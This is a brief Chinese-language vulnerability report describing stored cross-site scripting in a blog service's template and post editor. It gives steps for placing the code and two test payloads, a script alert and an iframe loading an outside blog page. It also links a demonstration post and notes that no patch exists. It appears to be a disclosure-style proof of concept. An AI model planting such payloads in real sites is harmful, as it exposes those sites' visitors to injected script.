漏洞测试过程:
1.申请了一个帐号
2.进入后台--博客--模板--首页布局设置--文章内容[编辑]
3.在对话框中的编辑链接处加上跨站代码或进入文章发布
切换编辑器至HTML模式
4.测试代码
<script>alert(/http://hi.baidu.com/5427518/)</script>
<iframe src=http://hi.baidu.com/5427518>
效果演示:http://vini5.blogbus.com/logs/59446162.html
安全补丁:
尚无